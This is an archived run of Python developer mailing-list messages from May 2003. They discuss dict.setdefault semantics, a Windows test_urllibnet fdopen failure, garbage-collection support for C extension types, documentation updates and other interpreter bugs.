 you're absolutely right!!!


> Luke>  if, however, you do this:
> 
> Luke>          for t in range(5):
> Luke>                  for r in range(10):
> Luke>                          foo = log.setdefault(r,[])
> Luke>                          foo.append("test %d\n" % t)
>  
> Luke>  then empirically i conclude that you DO end up with the
> Luke>  expected results (but is this true all of the time?)
> 
> I presume that is because you are now dealing with vectors instead
> of strings.  In that case, you could also have written
> 
>         for t in range(5):
>                 for r in range(10):
>                         foo = log.setdefault(r,[])
>                         foo += ["test %d\n" % t]
> 
> with the same effect.
> 
> Luke>  the reason why your example, andrew, does not work, is
> Luke>  because '' is a string - a basic type to which a pointer is
> Luke>  NOT returned i presume that the foo += "test %d"... returns a
> Luke>  DIFFERENT result object such that the string in the dictionary
> Luke>  is DIFFERENT from the string result of foo being updated.
> 
> Well, yes.  But that is what you would have gotten had you been allowed
> to write
> 
>                 log.setdefault(r,"") += <whatever>
> 
> in the first place.

 [i oversimplified in the example, leading to all the communication
  problems.

  the _actual_  usage i was expecting is based on {}.setdefault(0, []) += [1,2]
  rather than setdefault(0, '') += 'hh'

 ]


> Luke>  can anyone tell me if there are any PARTICULAR circumstances where
> 
> Luke>                          foo = log.setdefault(r,[])
> Luke>                          foo.append("test %d\n" % t)
> 
> Luke>  will FAIL to work as expected?
> 
> It will fail if your expectations are incorrect or unrealistic.
 
 ...  that sounds like a philosophical or "undefined" answer rather
 than the technical one i was seeking

 ... but it is actually quite a _useful_ answer :)

 to put the question a different way -- that is, to ask a different,
 more specific question:

 can anyone tell me if there are circumstances under which the second
 argument from setdefault will SOMETIMES be copied instead of returned
 and SOMETIMES be returned as-is, such that operations of the type
 being attempted will SOMETIMES work as expected and SOMETIMES not?
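
 for reference, the kind of check i have been running looks roughly like
 this (a small sketch rather than the real code):

     d = {}
     a = d.setdefault(0, [])
     print a is d[0]            # prints True: the very same list object
     a.append('x')
     print d[0]                 # prints ['x']
     b = d.setdefault(0, [])    # key already present, so default is ignored
     print b is a               # prints True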

 
> Luke>  andrew, sorry it took me so long to respond: i initially
> Luke>  thought that under all circumstances for all types of foo,
> Luke>  your example would work.
> 
> But it does!  At least in the sense of the original query.
 
  where the sense was mistaken; consequently the results are,
  as you rightly pointed out, not as expected.

> The original query was of the form
> 
>         Why can't I write an expression like  f(x) += y?
> 
> and my answer was, in effect, 
> 
>         If you could, it would have the same effect as if you had written
> 
>             foo = f(x)
>             foo += y
> 
>         and then used the value of foo.
> 
> Perhaps I'm missing something, but I don't think that anything you've said
> contradicts this answer.

 based on this clarification, my queries are two-fold:

 1) what is the technical, syntactical or language-specific reason why
    I can't write an expression like  f(x) += y ?

 
 2) the objections that i can see as to why f(x) += y should not be
    _allowed_ to work are that, as andrew points out, some people's
	expectations of any_function() += y may be unrealistic,
	particularly as normally the result of a function is discarded.
 
 	however, in the case of setdefault() and get() on dictionaries,
	the result of the function is NOT discarded: in SOME instances,
	a reference is returned to the dictionary item.

	under such circumstances, why should the objections - to disallow
	{}.setdefault(0, []) += [] or {}.get([]) += [] - stand?
	
 l.



From tim@zope.com  Fri May 16 15:30:37 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 10:30:37 -0400
Subject: [Python-Dev] test_urllibnet failing on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>

I'm not familiar with this test.

In a release build:

"""
C:\Code\python\PCbuild>python ../lib/test/test_urllibnet.py
testURLread (__main__.URLTimeoutTest) ... ok
test_bad_address (__main__.urlopenNetworkTests) ... ok
test_basic (__main__.urlopenNetworkTests) ... ok
test_fileno (__main__.urlopenNetworkTests) ... ERROR
test_geturl (__main__.urlopenNetworkTests) ... ok
test_info (__main__.urlopenNetworkTests) ... ok
test_readlines (__main__.urlopenNetworkTests) ... ok
test_basic (__main__.urlretrieveNetworkTests) ... ok
test_header (__main__.urlretrieveNetworkTests) ... ok
test_specified_path (__main__.urlretrieveNetworkTests) ... ok

======================================================================
ERROR: test_fileno (__main__.urlopenNetworkTests)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "../lib/test/test_urllibnet.py", line 91, in test_fileno
    FILE = os.fdopen(fd)
OSError: (0, 'Error')

----------------------------------------------------------------------
Ran 10 tests in 7.081s

FAILED (errors=1)
Traceback (most recent call last):
  File "../lib/test/test_urllibnet.py", line 149, in ?
    test_main()
  File "../lib/test/test_urllibnet.py", line 146, in test_main
    urlretrieveNetworkTests)
  File "C:\Code\python\lib\test\test_support.py", line 259, in run_unittest
    run_suite(suite, testclass)
  File "C:\Code\python\lib\test\test_support.py", line 247, in run_suite
    raise TestFailed(err)
test.test_support.TestFailed: Traceback (most recent call last):
  File "../lib/test/test_urllibnet.py", line 91, in test_fileno
    FILE = os.fdopen(fd)
OSError: (0, 'Error')
"""

In a debug build:

"""
C:\Code\python\PCbuild>python_d ../lib/test/test_urllibnet.py
testURLread (__main__.URLTimeoutTest) ... ok
test_bad_address (__main__.urlopenNetworkTests) ... ok
test_basic (__main__.urlopenNetworkTests) ... ok
test_fileno (__main__.urlopenNetworkTests) ...
"""

and there it dies with an assertion error in the bowels of Microsoft's
fdopen.c.  That's called by Python's posix_fdopen, here:

	fp = fdopen(fd, mode);

At this point, fd is 436.  MS's fdopen is unhappy because only 32 handles
actually exist at this point, and 436 is bigger than that.  In the release
build, the MS assert doesn't (of course) trigger; instead, that 436 >= 32
causes MS's fdopen to return NULL.



From skip@pobox.com  Fri May 16 15:41:22 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 09:41:22 -0500
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
Message-ID: <16068.63634.915049.706423@montanaro.dyndns.org>

    Tim> I'm not familiar with this test.
    Tim> In a release build:
    ...

Brett added a bunch of tests to that file the other day.  I imagine he'll
take a look when the sun comes up on the west coast.

Skip


From guido@python.org  Fri May 16 16:02:59 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 11:02:59 -0400
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: "Your message of Fri, 16 May 2003 10:30:37 EDT."
 <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
Message-ID: <200305161502.h4GF2xk20132@pcp02138704pcs.reston01.va.comcast.net>

> I'm not familiar with this test.

Me neither, but Brett C should be. :-)

> In a debug build:
> 
> """
> C:\Code\python\PCbuild>python_d ../lib/test/test_urllibnet.py
> testURLread (__main__.URLTimeoutTest) ... ok
> test_bad_address (__main__.urlopenNetworkTests) ... ok
> test_basic (__main__.urlopenNetworkTests) ... ok
> test_fileno (__main__.urlopenNetworkTests) ...
> """
> 
> and there it dies with an assertion error in the bowels of Microsoft's
> fdopen.c.  That's called by Python's posix_fdopen, here:
> 
> 	fp = fdopen(fd, mode);
> 
> At this point, fd is 436.  MS's fdopen is unhappy because only 32
> handles actually exist at this point, and 436 is bigger than that.
> In the release build, the MS assert doesn't (of course) trigger;
> instead, that 436 >= 32 causes MS's fdopen to return NULL.

The test assumes that the fileno() from a socket object can be passed
to os.fdopen().  That works on Unix.  But on Windows it cannot: the
small ints used to refer to open files are chosen from a different
(though potentially overlapping) space than the small ints used to
refer to open sockets, and the two cannot be mixed.

So the test should be disabled on Windows.
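
Something along these lines would do it (just a sketch, not an actual
patch; the class name merely mirrors the test module):

    import sys, unittest

    class urlopenNetworkTests(unittest.TestCase):
        def test_fileno(self):
            if sys.platform == 'win32':
                # Socket "fds" and C runtime fds live in different spaces
                # on Windows, so os.fdopen() can't accept a socket's fileno().
                return
            # ... the existing body of the test would follow here ...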

I don't know if we can protect os.fdopen() from crashing when passed
an out of range number.

--Guido van Rossum (home page: http://www.python.org/~guido/)



From barry@python.org  Fri May 16 16:09:05 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 11:09:05 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <2mn0hnyxpk.fsf@starship.python.net>
References: <200305160147.h4G1lCa09066@localhost.localdomain>
 <2mn0hnyxpk.fsf@starship.python.net>
Message-ID: <1053097745.1849.26.camel@barry>

On Fri, 2003-05-16 at 06:47, Michael Hudson wrote:

> > There's a bunch of cvs commit messages I've saved off as "potential
> > branch-patches". I might try to get to them this weekend.
> 
> My python-bugfixes mbox is still online:
> 
>     http://starship.python.net/crew/mwh/python-bugfixes
> 
> Some of it might still be relevant -- I haven't been that conscientious
> about keeping it up to date.

I definitely do not have the time to triage or apply backports.  I think
you'll have to use your own judgment, tempered by your available time,
to decide which patches should be backported.  Guido obviously thinks
2.2.3 is ready now so you should prioritize, but be conservative.

If you have specific questions, python-dev is the place to ask.

-Barry




From tim@zope.com  Fri May 16 16:33:24 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 11:33:24 -0400
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: <200305161502.h4GF2xk20132@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEHNFLAA.tim@zope.com>

[Guido]
> The test assumes that the fileno() from a socket object can be passed
> to os.fdopen().

Yup, Jeremy figured that out here.  I have a patch waiting to go, but SF
isn't cooperating.

> That works on Unix.  But on Windows it cannot, the small ints used to
> refer to open files are chosen from a different (though potentially
> overlapping) space than the small ints used to refer to open sockets,
> and the two cannot be mixed.

Just so.

> So the test should be disabled on Windows.
>
> I don't know if we can protect os.fdopen() from crashing when passed
> an out of range number.

This is an issue only in the MSVC debug build.  The release-build MS
libraries *still* explicitly check for out-of-range, and arrange for an
error return when it is out of range.  I really don't understand why they're
asserting in-range in their debug build libraries, because nothing in
*their* code assumes the fd is in-range -- their code is defensive enough in
the release build that nothing bad will happen even when it is out of range.



From barry@python.org  Fri May 16 16:44:44 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 11:44:44 -0400
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <20030516153518.68B1B18EC13@grendel.zope.com>
References: <20030516153518.68B1B18EC13@grendel.zope.com>
Message-ID: <1053099884.1849.49.camel@barry>

On Fri, 2003-05-16 at 11:35, Fred L. Drake wrote:
> The development version of the documentation has been updated:
> 
>     http://www.python.org/dev/doc/devel/
> 
> Various updates, including Jim Fulton's efforts on updating the Extending &
> Embedding manual.

I think this one's gonna make my Python quotes file:

"So, if you want to define a new object type, you need to create a new
type object."

:)
-Barry




From jim@zope.com  Fri May 16 16:46:19 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 11:46:19 -0400
Subject: [Python-Dev] C new-style classes and GC
Message-ID: <3EC507CB.6080502@zope.com>

Lately I've been re-learning how to write new types in C.  Things
changed drastically (for the better) in 2.2. I've been updating the
documentation on writing new types as I go:

http://www.python.org/dev/doc/devel/ext/defining-new-types.html

(I'm also updating modulator.)

I'm starting to try to figure out how to integrate support for GC.
The current documentation in the section "Supporting the Cycle
Collector" doesn't reflect new-style types and is, thus, out of date.

Frankly, I'm taking the approach that there is only One Way to create
types in C, the new way, based on new-style types as now documented
in the manual.

I'll also note that most new-style types don't need and thus don't
implement custom allocators. They leave the tp_alloc and tp_free slots
empty.

So given that we have a new style type, to add support for GC, we need
to:

- Set the Py_TPFLAGS_HAVE_GC type flag,

- Provide implementations of tp_traverse and tp_clear, as described in
   the section "Supporting the Cycle Collector" section of the docs.

- Call PyObject_GC_UnTrack at the beginning of the deallocator,
   before decrefing any members.

I think that that is *all* we have to do.

In particular, since we have a new style type that inherits the
standard allocator, we don't need to fool with PyObject_GC_New, and
PyObject_GC_DEL, because the default tp_alloc and tp_free take care of
that for us. Similarly, we don't need to call PyObject_GC_Track,
because that is done by the default allocator. (Because of that, our
traverse function has to check for null object pointers in our
object's members.)

Did I get this right? I intend to update the docs to reflect this
understanding (or a corrected one, of course).

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From mwh@python.net  Fri May 16 17:03:10 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 16 May 2003 17:03:10 +0100
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <1053099884.1849.49.camel@barry> (Barry Warsaw's message of "16
 May 2003 11:44:44 -0400")
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry>
Message-ID: <2m7k8qkhfl.fsf@starship.python.net>

Barry Warsaw <barry@python.org> writes:

> On Fri, 2003-05-16 at 11:35, Fred L. Drake wrote:
>> The development version of the documentation has been updated:
>> 
>>     http://www.python.org/dev/doc/devel/
>> 
>> Various updates, including Jim Fulton's efforts on updating the Extending &
>> Embedding manual.
>
> I think this one's gonna make my Python quotes file:
>
> "So, if you want to define a new object type, you need to create a new
> type object."
>
> :)

That's been there since rev 1.1, which I actually wrote...

Cheers,
M.

-- 
  For their next act, they'll no doubt be buying a firewall
  running under NT, which makes about as much sense as
  building a prison out of meringue.                     -- -:Tanuki:-
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From fdrake@acm.org  Fri May 16 17:11:58 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 12:11:58 -0400
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <2m7k8qkhfl.fsf@starship.python.net>
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry>
 <2m7k8qkhfl.fsf@starship.python.net>
Message-ID: <16069.3534.513541.138020@grendel.zope.com>

Michael Hudson writes:
 > That's been there since rev 1.1, which I actually wrote...

That explains why it sounded vaguely familiar.  ;-)  I have actually
read the version you wrote, and didn't find that sentence in need of
changing.

Perhaps Barry is too easily amused?  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From mwh@python.net  Fri May 16 17:32:53 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 16 May 2003 17:32:53 +0100
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <16069.3534.513541.138020@grendel.zope.com> ("Fred L. Drake,
 Jr."'s message of "Fri, 16 May 2003 12:11:58 -0400")
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry> <2m7k8qkhfl.fsf@starship.python.net>
 <16069.3534.513541.138020@grendel.zope.com>
Message-ID: <2m4r3ukg22.fsf@starship.python.net>

"Fred L. Drake, Jr." <fdrake@acm.org> writes:

> Michael Hudson writes:
>  > That's been there since rev 1.1, which I actually wrote...
>
> That explains why it sounded vaguely familiar.  ;-)  I have actually
> read the version you wrote, and didn't find that sentence in need of
> changing.

I must have been in a fairly odd mood when I wrote it -- "A PyObject
is not a very magnificent object" is one of mine, too.

> Perhaps Barry is too easily amused?  ;-)

I don't think documentation should be disallowed from being
entertaining :-) (or short, but that's a different rant)

Cheers,
M.

-- 
  Hey, if I thought I was wrong, I'd change my mind.  :)
                                    -- Grant Edwards, comp.lang.python


From jeremy@zope.com  Fri May 16 17:42:03 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 12:42:03 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <3EC507CB.6080502@zope.com>
References: <3EC507CB.6080502@zope.com>
Message-ID: <1053103323.456.71.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 11:46, Jim Fulton wrote:
> So given that we have a new style type, to add support for GC, we need
> to:
> 
> - Set the Py_TPFLAGS_HAVE_GC type flag,
> 
> - Provide implementations of tp_traverse and tp_clear, as described in
>    the section "Supporting the Cycle Collector" section of the docs.
> 
> - Call PyObject_GC_UnTrack at the beginning of the deallocator,
>    before decrefing any members.
> 
> I think that that is *all* we have to do.
> 
> In particular, since we have a new style type that inherits the
> standard allocator, we don't need to fool with PyObject_GC_New, and
> PyObject_GC_DEL, because the default tp_alloc and tp_free take care of
> that for us. Similarly, we don't need to call PyObject_GC_Track,
> because that is done by the default allocator. (Because of that, our
> traverse function has to check for null object pointers in our
> object's members.)

It depends on how the objects are used in C code.  I've upgraded a lot
of C extensions to make their types collectable recently.  In several
cases, it was necessary to change PyObject_New to PyObject_GC_New and
add a PyObject_GC_Track.  I think the docs ought to explain how to do
this.

It's not clear to me what the one right way to implement a tp_dealloc
slot is.  I've seen two common patterns in the Python source: call
obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
initializes tp_free to PyObject_GC_Del, so in most cases the two
spellings are equivalent.  Calling PyObject_GC_Del feels more
straightforward to me.

This question isn't specific to GC.  Perhaps it's a question of what
tp_free is used for and when it should be called.  Pure-Python classes
and instances have tp_dealloc implementations that call tp_free.  I'm
not sure if that's a generic recommendation for all types written in C.

> Did I get this right? I intend to update the docs to reflect this
> understanding (or a corrected one, of course).

The three items you listed were sufficient for all the types I've worked
on, excepting the issues I noted above.

Jeremy




From jim@zope.com  Fri May 16 18:08:34 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 13:08:34 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <1053103323.456.71.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com> <1053103323.456.71.camel@slothrop.zope.com>
Message-ID: <3EC51B12.8070407@zope.com>

Jeremy Hylton wrote:
> On Fri, 2003-05-16 at 11:46, Jim Fulton wrote:
> 
>>So given that we have a new style type, to add support for GC, we need
>>to:
>>
>>- Set the Py_TPFLAGS_HAVE_GC type flag,
>>
>>- Provide implementations of tp_traverse and tp_clear, as described in
>>   the section "Supporting the Cycle Collector" section of the docs.
>>
>>- Call PyObject_GC_UnTrack at the beginning of the deallocator,
>>   before decrefing any members.
>>
>>I think that that is *all* we have to do.
>>
>>In particular, since we have a new style type that inherits the
>>standard allocator, we don't need to fool with PyObject_GC_New, and
>>PyObject_GC_DEL, because the default tp_alloc and tp_free take care of
>>that for us. Similarly, we don't need to call PyObject_GC_Track,
>>because that is done by the default allocator. (Because of that, our
>>traverse function has to check for null object pointers in our
>>object's members.)
> 
> 
> It depends on how the objects are used in C code.  I've upgraded a lot
> of C extensions to make their types collectable recently.  In several
> cases, it was necessary to change PyObject_New to PyObject_GC_New and
> add a PyObject_GC_Track.  I think the docs ought to explain how to do
> this.

If you write types the New Way, there are no PyObject_New calls and
no need to call PyObject_GC_Track.

> It's not clear to me what the one right way to implement a tp_dealloc
> slot is.  I've seen two common patterns in the Python source: call
> obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> initializes tp_free to PyObject_GC_Del, so in most cases the two
> spellings are equivalent.  Calling PyObject_GC_Del feels more
> straightforward to me.

You need to call obj->ob_type->tp_free to support subclassing.

I suggest that every new type should call obj->ob_type->tp_free
as a matter of course.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From mal@lemburg.com  Fri May 16 18:09:48 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 16 May 2003 19:09:48 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <1052927757.7258.38.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com>
Message-ID: <3EC51B5C.2080307@lemburg.com>

Jeremy Hylton wrote:
> The use of re in the warnings module seems the primary culprit, since it
> pulls in re, sre and friends, string, and strop.

FWIW, I've removed the re usage from encodings/__init__.py.

Could you check whether this makes a difference in startup time
now ?

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 16 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        39 days left



From barry@python.org  Fri May 16 18:21:04 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 13:21:04 -0400
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <2m4r3ukg22.fsf@starship.python.net>
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry> <2m7k8qkhfl.fsf@starship.python.net>
 <16069.3534.513541.138020@grendel.zope.com>
 <2m4r3ukg22.fsf@starship.python.net>
Message-ID: <1053105659.2342.2.camel@barry>

On Fri, 2003-05-16 at 12:32, Michael Hudson wrote:

> I must have been in a fairly odd mood when I wrote it -- "A PyObject
> is not a very magnificent object" is one of mine, too.

That's the other one I enjoyed!

> > Perhaps Barry is too easily amused?  ;-)

That may be true, but it /did/ have a nice lyrical quality to it.  I'm
not saying it should be changed!  In fact we need more documentation like
that <wink>.

-Barry




From mal@lemburg.com  Fri May 16 18:25:04 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 16 May 2003 19:25:04 +0200
Subject: [Python-Dev] test_time fails with current CVS
Message-ID: <3EC51EF0.3080701@lemburg.com>

Just thought you'd like to know:

test test_time failed -- Traceback (most recent call last):
   File "/home/lemburg/projects/Python/Dev-Python/Lib/test/test_time.py", line 107, in test_tzset
     self.failUnless(time.tzname[1] == 'AEDT', str(time.tzname[1]))
   File "/home/lemburg/projects/Python/Dev-Python/Lib/unittest.py", line 268, in failUnless
     if not expr: raise self.failureException, msg
AssertionError: AEST

In case it helps: I live on the northern hemisphere :-)

BTW, the correct time zone names are: EAST and EADT -- perhaps
that's what's causing the problem ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 16 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        39 days left



From jeremy@zope.com  Fri May 16 18:35:33 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 13:35:33 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <3EC51B12.8070407@zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com>
Message-ID: <1053106533.453.78.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 13:08, Jim Fulton wrote:
> If you write types the New Way, there are no PyObject_New calls and
> no need to call PyObject_GC_Track.

I don't follow.  There are plenty of types that are garbage collectable
that also use PyObject_GC_New.  One example is PyDict_New().  If
something is widespread in the Python source tree (a common source of
example code for programmers), it ought to be documented.

> > It's not clear to me what the one right way to implement a tp_dealloc
> > slot is.  I've seen two common patterns in the Python source: call
> > obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> > initializes tp_free to PyObject_GC_Del, so in most cases the two
> > spellings are equivalent.  Calling PyObject_GC_Del feels more
> > straightforward to me.
> 
> You need to call obj->ob_type->tp_free to support subclassing.
> 
> I suggest that every new type should call obj->ob_type->tp_free
> as a matter of course.

If the type is going to support subclassing.

Jeremy




From guido@python.org  Fri May 16 18:37:21 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 13:37:21 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of 16 May 2003 12:42:03 EDT."
 <1053103323.456.71.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>
Message-ID: <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>

> It's not clear to me what the one right way to implement a tp_dealloc
> slot is.  I've seen two common patterns in the Python source: call
> obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> initializes tp_free to PyObject_GC_Del, so in most cases the two
> spellings are equivalent.  Calling PyObject_GC_Del feels more
> straightforward to me.

But calling tp_free is more correct.  This allows a subclass to change
the memory allocation policy.  (This is also important if a base class
is not collectible but a subclass is -- then it's essential that the
base class dealloc handler calls tp_free.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@zope.com  Fri May 16 19:12:33 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 14:12:33 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>
 <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1053108753.457.100.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 13:37, Guido van Rossum wrote:
> > It's not clear to me what the one right way to implement a tp_dealloc
> > slot is.  I've seen two common patterns in the Python source: call
> > obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> > initializes tp_free to PyObject_GC_Del, so in most cases the two
> > spellings are equivalent.  Calling PyObject_GC_Del feels more
> > straightforward to me.
> 
> But calling tp_free is more correct.  This allows a subclass to change
> the memory allocation policy.  (This is also important if a base class
> is not collectible but a subclass is -- then it's essential that the
> base class dealloc handler calls tp_free.)

There are dozens of objects in Python that do not call tp_free.  For
example, range objects have a tp_dealloc that is set to PyObject_Del().
Should we change those?  Or should we say that it's okay to call
PyObject_Del() and PyObject_GC_Del() from objects that are not intended
to be subclassed?

(patch pending :-)

Jeremy




From tim@zope.com  Fri May 16 19:12:12 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 14:12:12 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEJAFLAA.tim@zope.com>

[Guido]
> But calling tp_free is more correct.  This allows a subclass to change
> the memory allocation policy.  (This is also important if a base class
> is not collectible but a subclass is -- then it's essential that the
> base class dealloc handler calls tp_free.)

I think the scoop is that cyclic gc got added before new-style classes, so
at the time new-style classes were introduced *all* tp_dealloc slots for
gc'able types called the gc del function directly.  After that, I expect the
only ones that got changed were those reviewed (lists, tuples, dicts, ...)
as part of making test_descr.py's subclass-from-builtin tests work.

Jeremy is rummaging thru current CVS now changing the others (frames,
functions, ...).  Does this count as a bugfix, i.e. should it be backported
to 2.2.3?



From guido@python.org  Fri May 16 19:23:51 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 14:23:51 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of 16 May 2003 14:12:33 EDT."
 <1053108753.457.100.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>
 <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
 <1053108753.457.100.camel@slothrop.zope.com>
Message-ID: <200305161823.h4GINpR06675@pcp02138704pcs.reston01.va.comcast.net>

> There are dozens of objects in Python that do not call tp_free.  For
> example, range object's have a tp_dealloc that is set to PyObject_Del().
> Should we change those?  Or should we say that it's okay to call
> PyObject_Del() and PyObject_GC_Del() from objects that are not intended
> to be subclassed?

If those types don't have the Py_TPFLAGS_BASETYPE flag set, they're
okay.  Otherwise they should be fixed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri May 16 19:24:24 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 14:24:24 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 14:12:12 EDT."
 <BIEJKCLHCIOIHAGOKOLHCEJAFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHCEJAFLAA.tim@zope.com>
Message-ID: <200305161824.h4GIOOf06688@pcp02138704pcs.reston01.va.comcast.net>

> Jeremy is rummaging thru current CVS now changing the others
> (frames, functions, ...).  Does this count as a bugfix, i.e. should
> it be backported to 2.2.3?

For the ones that are subclassable in 2.2.3, yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Fri May 16 19:36:44 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 14:36:44 -0400
Subject: [Python-Dev] a strange case
Message-ID: <16069.12220.217558.569689@grendel.zope.com>

Here's a strange case we just ran across, led along by a typo in an
import statement.  This is using the head of the 2.2.x maintenance
branch; I've not tested this against the trunk yet.

>>> import os
>>> class Foo(os):
...   pass
...
>>> Foo
<module '?' (built-in)>

I suspect this isn't intentional behavior.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From barry@python.org  Fri May 16 19:44:39 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 14:44:39 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <16069.12220.217558.569689@grendel.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
Message-ID: <1053110679.2342.4.camel@barry>

On Fri, 2003-05-16 at 14:36, Fred L. Drake, Jr. wrote:
> Here's a strange case we just ran across, led along by a typo in an
> import statement.  This is using the head of the 2.2.x maintenance
> branch; I've not tested this against the trunk yet.
> 
> >>> import os
> >>> class Foo(os):
> ...   pass
> ...
> >>> Foo
> <module '?' (built-in)>
> 
> I suspect this isn't intentional behavior.  ;-)

No, it's not, and in 2.3 you get an error (albeit a TypeError with a
rather unhelpful message).  I guess the "fix" hasn't been backported.

-Barry




From jeremy@zope.com  Fri May 16 19:50:00 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 14:50:00 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <1053110679.2342.4.camel@barry>
References: <16069.12220.217558.569689@grendel.zope.com>
 <1053110679.2342.4.camel@barry>
Message-ID: <1053111000.456.111.camel@slothrop.zope.com>

